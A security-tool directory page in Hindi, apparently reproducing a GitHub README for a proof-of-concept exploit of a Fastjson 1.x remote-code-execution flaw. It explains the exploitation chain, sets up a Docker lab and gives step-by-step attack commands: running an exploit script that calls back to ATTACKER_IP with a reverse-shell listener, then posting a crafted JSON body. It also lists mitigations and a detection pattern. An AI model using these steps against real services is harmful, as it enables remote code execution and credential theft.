Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-16723 — CVE-2026-16723 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Fastjson 1.x @JSONType रिमोट कोड एक्ज़ीक्यूशन फ्लॉ है, जिसमें एक पेलोड JAR बिल्डर और रिवर्स-शेल लिसनर शामिल है। | Kitploit
उपकरण/GitHubGitHub/yym8538/cve-2026-16723
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगरिमोट एक्सेस टूल
GitHubyym8538/cve-2026-16723

CVE-2026-16723

CVE-2026-16723 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Fastjson 1.x @JSONType रिमोट कोड एक्ज़ीक्यूशन फ्लॉ है, जिसमें एक पेलोड JAR बिल्डर और रिवर्स-शेल लिसनर शामिल है।

रिपॉजिटरी देखें
11 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-16723 Fastjson RCE

★ CVE-2026-16723 Fastjson @JSONType RCE PoC ★


अवलोकन

CVE-2026-16723 Fastjson 1.x (1.2.68 – 1.2.83) में एक रिमोट कोड एक्ज़ीक्यूशन (RCE) भेद्यता है। जब Fastjson हमलावर-नियंत्रित JSON को पार्स करता है, तो एक तैयार किया गया @type मान checkAutoType के अंदर एक क्लास-रिसोर्स लुकअप में बदल जाता है। एक Spring Boot executable fat-JAR में क्लास लोडर उस नाम को jar:http:// URL के रूप में रिज़ॉल्व करता है और एक रिमोट JAR (SSRF) फ़ेच करता है, फिर @JSONType एनोटेशन वाली एक क्लास लोड करता है, भले ही AutoType अक्षम हो। चूँकि एक आधुनिक JDK / Tomcat jar:http:// बाइनरी नाम को अस्वीकार करता है, विश्वसनीय वेरिएंट JAR को JVM कैश में सीड करता है और उसे jar:file:/proc/self/fd/N के माध्यम से दोबारा पढ़ता है, जिससे क्लास परिभाषित हो जाती है और उसका स्टैटिक इनिशियलाइज़र चलता है, जिससे कोड एक्ज़ीक्यूशन मिलता है। AutoType अक्षम ही रहता है और किसी क्लासपाथ गैजेट की आवश्यकता नहीं होती।


प्रभावित संस्करण

श्रेणीसंस्करण
भेद्यFastjson 1.2.68 ≤ version ≤ 1.2.83
पैच किया गयाFastjson 2.x पर माइग्रेट करें (कोई फिक्स्ड 1.x रिलीज़ नहीं)

प्रभाव

  • सेवा खाते के रूप में रिमोट कोड एक्ज़ीक्यूशन
  • होस्ट और एनवायरनमेंट से सीक्रेट / क्रेडेंशियल का खुलासा
  • प्रभावित एप्लिकेशन का पूर्ण समझौता

एनवायरनमेंट

लैब लक्ष्य एक सार्वजनिक स्टोरफ्रंट (Northwind Store) है जिसका सर्च API अपने रिक्वेस्ट बॉडी को Fastjson के साथ बाइंड करता है। सब कुछ Fastjson का स्टॉक डिफ़ॉल्ट है: SafeMode बंद, AutoType बंद, Spring Boot fat-JAR के रूप में पैकेज्ड।

docker build -t cve-2026-16723 .
docker run -d --name cve-2026-16723 -p 8080:8080 cve-2026-16723
पूर्वापेक्षाइस लैब में स्थिति
Fastjson 1.2.68 – 1.2.831.2.83
Spring Boot executable fat-JARहाँ
अनऑथेंटिकेटेड JSON पार्स पथPOST /api/products/search
SafeMode / AutoTypeडिफ़ॉल्ट (दोनों बंद)

PoC

हमलावर और लक्ष्य एक ही Docker ब्रिज नेटवर्क पर चलते हैं, इसलिए लक्ष्य हमलावर तक एक आउटबाउंड कनेक्शन के रूप में पहुँचता है (कोई अतिरिक्त पोर्ट प्रकाशित नहीं होता)।

चरण 1. पुष्टि करें कि लक्ष्य चालू है

curl http://TARGET_IP:8080/api/health
curl -X POST http://TARGET_IP:8080/api/products/search \
  -H 'Content-Type: application/json' -d '{"keyword":"keyboard"}'

चरण 2. हमलावर मशीन पर एक्सप्लॉइट चलाएँ

exploit.py पेलोड JAR बनाता है, उसे सर्व करता है, एक लिसनर शुरू करता है, और रिक्वेस्ट बॉडी प्रिंट करता है। केवल कॉलबैक पता आवश्यक है।

python3 attacker/exploit.py --lhost ATTACKER_IP --lport 4444

चरण 3. पेलोड डिलीवर करें

प्रिंट की गई बॉडी को सर्च एंडपॉइंट (Burp Repeater या curl) में पेस्ट करें और उसे भेजें। सर्च रिक्वेस्ट एक सामान्य सुविधा है; केवल उसकी JSON बॉडी तैयार की गई है।

curl -X POST http://TARGET_IP:8080/api/products/search \
  -H 'Content-Type: application/json' --data-binary @body.json

चरण 4. परिणाम की पुष्टि करें

कोड सेवा खाते के रूप में चलता है। प्राप्त शेल के माध्यम से फ्लैग प्राप्त करें:

whoami

शमन

  • Fastjson 2.x पर माइग्रेट करें
  • या com.alibaba:fastjson:1.2.83_noneautotype चलाएँ
  • या JVM को -Dfastjson.parser.safeMode=true के साथ शुरू करें
  • डिटेक्शन: JSON @type मान जिनमें jar:http या jar:file / /proc/self/fd पैटर्न हों

विश्लेषण

  • KR:
  • EN:
टूल डाउनलोड करें